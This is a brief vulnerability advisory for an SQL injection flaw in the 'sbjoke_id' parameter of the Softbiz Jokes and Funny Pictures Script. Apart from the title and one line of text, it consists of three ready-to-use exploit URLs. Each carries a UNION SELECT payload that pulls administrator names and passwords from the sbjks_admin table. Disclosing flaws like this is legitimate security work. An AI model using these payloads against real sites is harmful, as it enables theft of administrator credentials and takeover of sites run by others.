Softbiz Jokes and Funny Pictures Script 'sbjoke_id' Parameter SQL Injection Vulnerability

Softbiz Jokes and Funny Pictures Script 'sbjoke_id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10+from+sbjks_admin--
http://www.example.com/Script/index.php?sbjoke_id=-1+union+select+0,1,2,3,concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10,11,12,13+from+sbjks_admin--
http://www.example.com/index.php?sbjoke_id=-5592+union+all+select+1,2,3,4,concat(sbadmin_name,0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_admin--